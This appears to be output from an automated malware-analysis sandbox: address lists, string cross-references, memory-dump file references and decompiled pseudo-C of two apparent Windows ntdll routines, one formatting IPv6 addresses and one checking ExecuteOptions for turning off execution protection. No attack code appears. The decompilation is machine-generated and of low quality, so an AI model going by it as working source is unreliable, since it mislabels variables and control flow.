                                                                                                                                                                                    0x00868a0e
                                                                                                                                                                                    0x00868a11
                                                                                                                                                                                    0x00868a14
                                                                                                                                                                                    0x00868a15
                                                                                                                                                                                    0x00868a18
                                                                                                                                                                                    0x00868a22
                                                                                                                                                                                    0x00868b59
                                                                                                                                                                                    0x00868a28
                                                                                                                                                                                    0x00868a3c
                                                                                                                                                                                    0x00868a3c
                                                                                                                                                                                    0x00868a42
                                                                                                                                                                                    0x008b1bb0
                                                                                                                                                                                    0x008b1b11
                                                                                                                                                                                    0x008b1b11
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868a48
                                                                                                                                                                                    0x00868a51
                                                                                                                                                                                    0x00868a5b
                                                                                                                                                                                    0x00868a5e
                                                                                                                                                                                    0x00868a61
                                                                                                                                                                                    0x00868a69
                                                                                                                                                                                    0x00868a69
                                                                                                                                                                                    0x00868a6d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868a74
                                                                                                                                                                                    0x00868a7c
                                                                                                                                                                                    0x00868a7d
                                                                                                                                                                                    0x00868a91
                                                                                                                                                                                    0x00868a93
                                                                                                                                                                                    0x00868a93
                                                                                                                                                                                    0x00868a98
                                                                                                                                                                                    0x00868a9b
                                                                                                                                                                                    0x00868aa1
                                                                                                                                                                                    0x00868aa1
                                                                                                                                                                                    0x00868aa4
                                                                                                                                                                                    0x00868aaa
                                                                                                                                                                                    0x00868ab1
                                                                                                                                                                                    0x00868ac5
                                                                                                                                                                                    0x00868ac7
                                                                                                                                                                                    0x00868ac7
                                                                                                                                                                                    0x00868ac5
                                                                                                                                                                                    0x00868ace
                                                                                                                                                                                    0x008b1bc9
                                                                                                                                                                                    0x008b1bce
                                                                                                                                                                                    0x008b1bd2
                                                                                                                                                                                    0x008b1bd2
                                                                                                                                                                                    0x00868ad8
                                                                                                                                                                                    0x00868aeb
                                                                                                                                                                                    0x00868aeb
                                                                                                                                                                                    0x00868af0
                                                                                                                                                                                    0x00868af4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868af4
                                                                                                                                                                                    0x00868a42
                                                                                                                                                                                    0x00868926
                                                                                                                                                                                    0x00868929
                                                                                                                                                                                    0x0086892c
                                                                                                                                                                                    0x0086892d
                                                                                                                                                                                    0x00868930
                                                                                                                                                                                    0x00868935
                                                                                                                                                                                    0x0086893a
                                                                                                                                                                                    0x00868b51
                                                                                                                                                                                    0x00868940
                                                                                                                                                                                    0x00868954
                                                                                                                                                                                    0x00868954
                                                                                                                                                                                    0x0086895a
                                                                                                                                                                                    0x008b1b63
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868960
                                                                                                                                                                                    0x00868969
                                                                                                                                                                                    0x00868973
                                                                                                                                                                                    0x00868976
                                                                                                                                                                                    0x00868979
                                                                                                                                                                                    0x0086897e
                                                                                                                                                                                    0x00868981
                                                                                                                                                                                    0x00868981
                                                                                                                                                                                    0x00868986
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008b1b6e
                                                                                                                                                                                    0x008b1b74
                                                                                                                                                                                    0x008b1b7b
                                                                                                                                                                                    0x008b1b8f
                                                                                                                                                                                    0x008b1b91
                                                                                                                                                                                    0x008b1b91
                                                                                                                                                                                    0x008b1b99
                                                                                                                                                                                    0x008b1b9c
                                                                                                                                                                                    0x008b1ba2
                                                                                                                                                                                    0x008b1ba2
                                                                                                                                                                                    0x0086898c
                                                                                                                                                                                    0x00868992
                                                                                                                                                                                    0x00868999
                                                                                                                                                                                    0x008689ad
                                                                                                                                                                                    0x008b1ba8
                                                                                                                                                                                    0x008b1ba8
                                                                                                                                                                                    0x008689ad
                                                                                                                                                                                    0x008689b6
                                                                                                                                                                                    0x008689c8
                                                                                                                                                                                    0x008689cd
                                                                                                                                                                                    0x008689d0
                                                                                                                                                                                    0x008689d0
                                                                                                                                                                                    0x008689d6
                                                                                                                                                                                    0x008689e8
                                                                                                                                                                                    0x008689e8
                                                                                                                                                                                    0x008689ed
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008689ed
                                                                                                                                                                                    0x0086895a
                                                                                                                                                                                    0x0086883e
                                                                                                                                                                                    0x00868841
                                                                                                                                                                                    0x00868844
                                                                                                                                                                                    0x00868845
                                                                                                                                                                                    0x00868848
                                                                                                                                                                                    0x0086884d
                                                                                                                                                                                    0x00868852
                                                                                                                                                                                    0x00868b49
                                                                                                                                                                                    0x00868858
                                                                                                                                                                                    0x0086886c
                                                                                                                                                                                    0x0086886c
                                                                                                                                                                                    0x00868872
                                                                                                                                                                                    0x008b1b0e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868878
                                                                                                                                                                                    0x00868881
                                                                                                                                                                                    0x0086888b
                                                                                                                                                                                    0x0086888e
                                                                                                                                                                                    0x00868891
                                                                                                                                                                                    0x00868896
                                                                                                                                                                                    0x00868899
                                                                                                                                                                                    0x00868899
                                                                                                                                                                                    0x0086889e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008b1b21
                                                                                                                                                                                    0x008b1b27
                                                                                                                                                                                    0x008b1b2e
                                                                                                                                                                                    0x008b1b42
                                                                                                                                                                                    0x008b1b44
                                                                                                                                                                                    0x008b1b44
                                                                                                                                                                                    0x008b1b4c
                                                                                                                                                                                    0x008b1b4f
                                                                                                                                                                                    0x008b1b55
                                                                                                                                                                                    0x008b1b55
                                                                                                                                                                                    0x008688a4
                                                                                                                                                                                    0x008688aa
                                                                                                                                                                                    0x008688b1
                                                                                                                                                                                    0x008688c5
                                                                                                                                                                                    0x008b1b5b
                                                                                                                                                                                    0x008b1b5b
                                                                                                                                                                                    0x008688c5
                                                                                                                                                                                    0x008688ce
                                                                                                                                                                                    0x008688e0
                                                                                                                                                                                    0x008688e5
                                                                                                                                                                                    0x008688e8
                                                                                                                                                                                    0x008688e8
                                                                                                                                                                                    0x008688ee
                                                                                                                                                                                    0x00868900
                                                                                                                                                                                    0x00868900
                                                                                                                                                                                    0x00868905
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868905

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00868827
                                                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 008689FC
                                                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00868914
                                                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 008687E6
                                                                                                                                                                                    • WindowsExcludedProcs, xrefs: 008687C1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                                                    • Opcode ID: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
                                                                                                                                                                                    • Instruction ID: a0beedfd14064349cd93d236cab166ebf6afab2a9e8389e16cba178684f12ebb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
                                                                                                                                                                                    • Instruction Fuzzy Hash: DCF1E3B2D00209EFCF11DF98C9859EEBBB8FF08304F15456AE515E7211EB349A45DB62
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                    			E008813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				char _t90;
                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                    				signed int _t96;
                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                                                    				_t116 = 0;
                                                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                                                    				_v8 = 8;
                                                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                                                    							L38:
                                                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    								_t86 = E00877707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                    								L36:
                                                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                                                    							L33:
                                                                                                                                                                                    							_t115 = 0x842926;
                                                                                                                                                                                    							L35:
                                                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                    							_t86 = E00877707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                                                    							_t115 = 0x849cac;
                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L5:
                                                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                    							_v8 = 6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                                                    						L11:
                                                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                                                    							L22:
                                                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    								_t128 = _t128 + E00877707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							return _t128;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							L14:
                                                                                                                                                                                    							L14:
                                                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                    									_push(":");
                                                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                    									_push(_t128);
                                                                                                                                                                                    									_t128 = _t128 + E00877707() * 2;
                                                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t78 = E00877707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_push(L"::");
                                                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                    								_push(_t128);
                                                                                                                                                                                    								_t78 = E00877707();
                                                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t108 = 1;
                                                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                                                    						do {
                                                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t116 = 0;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}




















                                                                                                                                                                                    0x008813d5
                                                                                                                                                                                    0x008813d9
                                                                                                                                                                                    0x008813dc
                                                                                                                                                                                    0x008813de
                                                                                                                                                                                    0x008813e1
                                                                                                                                                                                    0x008813e8
                                                                                                                                                                                    0x008813ee
                                                                                                                                                                                    0x008ae8fd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae921
                                                                                                                                                                                    0x008ae921
                                                                                                                                                                                    0x008ae928
                                                                                                                                                                                    0x008ae982
                                                                                                                                                                                    0x008ae98a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae99a
                                                                                                                                                                                    0x008ae99e
                                                                                                                                                                                    0x008ae9a3
                                                                                                                                                                                    0x008ae9a8
                                                                                                                                                                                    0x008ae9b9
                                                                                                                                                                                    0x008ae978
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae978
                                                                                                                                                                                    0x008ae98a
                                                                                                                                                                                    0x008ae92a
                                                                                                                                                                                    0x008ae931
                                                                                                                                                                                    0x008ae944
                                                                                                                                                                                    0x008ae944
                                                                                                                                                                                    0x008ae950
                                                                                                                                                                                    0x008ae954
                                                                                                                                                                                    0x008ae959
                                                                                                                                                                                    0x008ae95e
                                                                                                                                                                                    0x008ae963
                                                                                                                                                                                    0x008ae970
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae975
                                                                                                                                                                                    0x008ae93b
                                                                                                                                                                                    0x008ae980
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae980
                                                                                                                                                                                    0x008ae942
                                                                                                                                                                                    0x008ae94b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae94b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008ae942
                                                                                                                                                                                    0x008813f4
                                                                                                                                                                                    0x008813f4
                                                                                                                                                                                    0x008813f9
                                                                                                                                                                                    0x008813fc
                                                                                                                                                                                    0x008813ff
                                                                                                                                                                                    0x00881406
                                                                                                                                                                                    0x008ae9cc
                                                                                                                                                                                    0x008ae9d2
                                                                                                                                                                                    0x008ae9d2
                                                                                                                                                                                    0x008ae9cc
                                                                                                                                                                                    0x0088140c
                                                                                                                                                                                    0x00881411
                                                                                                                                                                                    0x00881431
                                                                                                                                                                                    0x0088143a
                                                                                                                                                                                    0x0088143c
                                                                                                                                                                                    0x0088143f
                                                                                                                                                                                    0x0088143f
                                                                                                                                                                                    0x00881442
                                                                                                                                                                                    0x00881447
                                                                                                                                                                                    0x008814a8
                                                                                                                                                                                    0x008814ac
                                                                                                                                                                                    0x008ae9e2
                                                                                                                                                                                    0x008ae9e7
                                                                                                                                                                                    0x008ae9ec
                                                                                                                                                                                    0x008aea05
                                                                                                                                                                                    0x008aea05
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00881449
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00881449
                                                                                                                                                                                    0x0088144c
                                                                                                                                                                                    0x00881459
                                                                                                                                                                                    0x00881462
                                                                                                                                                                                    0x00881469
                                                                                                                                                                                    0x0088146a
                                                                                                                                                                                    0x00881470
                                                                                                                                                                                    0x00881473
                                                                                                                                                                                    0x00881476
                                                                                                                                                                                    0x00881476
                                                                                                                                                                                    0x00881490
                                                                                                                                                                                    0x00881495
                                                                                                                                                                                    0x0088138e
                                                                                                                                                                                    0x00881390
                                                                                                                                                                                    0x00881397
                                                                                                                                                                                    0x00881398
                                                                                                                                                                                    0x00881399
                                                                                                                                                                                    0x008813a1
                                                                                                                                                                                    0x008813a4
                                                                                                                                                                                    0x008813a4
                                                                                                                                                                                    0x00881498
                                                                                                                                                                                    0x0088149c
                                                                                                                                                                                    0x0088149f
                                                                                                                                                                                    0x008814a2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008814a4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008814a4
                                                                                                                                                                                    0x00881413
                                                                                                                                                                                    0x00881415
                                                                                                                                                                                    0x00881416
                                                                                                                                                                                    0x00881419
                                                                                                                                                                                    0x0088141c
                                                                                                                                                                                    0x00881422
                                                                                                                                                                                    0x008813b7
                                                                                                                                                                                    0x008813bc
                                                                                                                                                                                    0x008813bf
                                                                                                                                                                                    0x008813bf
                                                                                                                                                                                    0x008813c2
                                                                                                                                                                                    0x00881424
                                                                                                                                                                                    0x00881424
                                                                                                                                                                                    0x00881424
                                                                                                                                                                                    0x00881427
                                                                                                                                                                                    0x0088142b
                                                                                                                                                                                    0x0088142c
                                                                                                                                                                                    0x0088142c
                                                                                                                                                                                    0x0088142c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0088141c
                                                                                                                                                                                    0x00881411

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
                                                                                                                                                                                    • Instruction ID: f5f1eb41661b95fd6dd23749a24487c9559a515f84d84ab06f078fab21e10d96
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6612971900659AACF34EF5DC8848BF7BBAFF95300718C42DE5EAC7640DA34AA41CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                    			E00877EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				char _v540;
                                                                                                                                                                                    				unsigned int _v544;
                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                    				unsigned int _t46;
                                                                                                                                                                                    				unsigned int _t47;
                                                                                                                                                                                    				unsigned int _t52;
                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                    				unsigned int _t62;
                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t33 =  *0x922088; // 0x77746b57
                                                                                                                                                                                    				_v8 = _t33 ^ _t73;
                                                                                                                                                                                    				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                    				_t72 = _a4;
                                                                                                                                                                                    				if(E00877F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                    					__eflags = _v548;
                                                                                                                                                                                    					if(_v548 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t62 = _t72 + 0x24;
                                                                                                                                                                                    					E00893F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                    					_t71 = 0x214;
                                                                                                                                                                                    					_v544 = 0x214;
                                                                                                                                                                                    					E0084DFC0( &_v540, 0, 0x214);
                                                                                                                                                                                    					_t75 = _t74 + 0x20;
                                                                                                                                                                                    					_t46 =  *0x924218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                    					__eflags = _t46;
                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t47 = _v544;
                                                                                                                                                                                    					__eflags = _t47;
                                                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					__eflags = _t47 - 0x214;
                                                                                                                                                                                    					if(_t47 >= 0x214) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push(_t62);
                                                                                                                                                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                    					E00893F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                    					_t52 = E00850D27( &_v540, L"Execute=1");
                                                                                                                                                                                    					_t76 = _t75 + 0x1c;
                                                                                                                                                                                    					_push(_t62);
                                                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                    						E00893F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                    						_t71 =  &_v540;
                                                                                                                                                                                    						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                    						_t77 = _t76 + 0x14;
                                                                                                                                                                                    						_v552 = _t56;
                                                                                                                                                                                    						__eflags = _t71 - _t56;
                                                                                                                                                                                    						if(_t71 >= _t56) {
                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							L10:
                                                                                                                                                                                    							_t62 = E00858375(_t71, 0x20);
                                                                                                                                                                                    							_pop(_t69);
                                                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								 *_t62 = 0;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							E00893F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                    							_t77 = _t77 + 0x10;
                                                                                                                                                                                    							E008BE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                                                    							if(_t62 == 0) {
                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                    							_t71 = _t31;
                                                                                                                                                                                    							__eflags = _t71 - _v552;
                                                                                                                                                                                    							if(_t71 >= _v552) {
                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                    					_push(3);
                                                                                                                                                                                    					_push(0x55);
                                                                                                                                                                                    					E00893F92();
                                                                                                                                                                                    					_t38 = 1;
                                                                                                                                                                                    					L2:
                                                                                                                                                                                    					return E0084E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L1:
                                                                                                                                                                                    				_t38 = 0;
                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                    			}



























                                                                                                                                                                                    0x00877f08
                                                                                                                                                                                    0x00877f0f
                                                                                                                                                                                    0x00877f12
                                                                                                                                                                                    0x00877f1b
                                                                                                                                                                                    0x00877f31
                                                                                                                                                                                    0x00893ead
                                                                                                                                                                                    0x00893eb4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00893eba
                                                                                                                                                                                    0x00893ecd
                                                                                                                                                                                    0x00893ed2
                                                                                                                                                                                    0x00893ee1
                                                                                                                                                                                    0x00893ee7
                                                                                                                                                                                    0x00893eec
                                                                                                                                                                                    0x00893f12
                                                                                                                                                                                    0x00893f18
                                                                                                                                                                                    0x00893f1a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00893f20
                                                                                                                                                                                    0x00893f26
                                                                                                                                                                                    0x00893f28
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00893f2e
                                                                                                                                                                                    0x00893f30
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00893f3a
                                                                                                                                                                                    0x00893f3b
                                                                                                                                                                                    0x00893f53
                                                                                                                                                                                    0x00893f64
                                                                                                                                                                                    0x00893f69
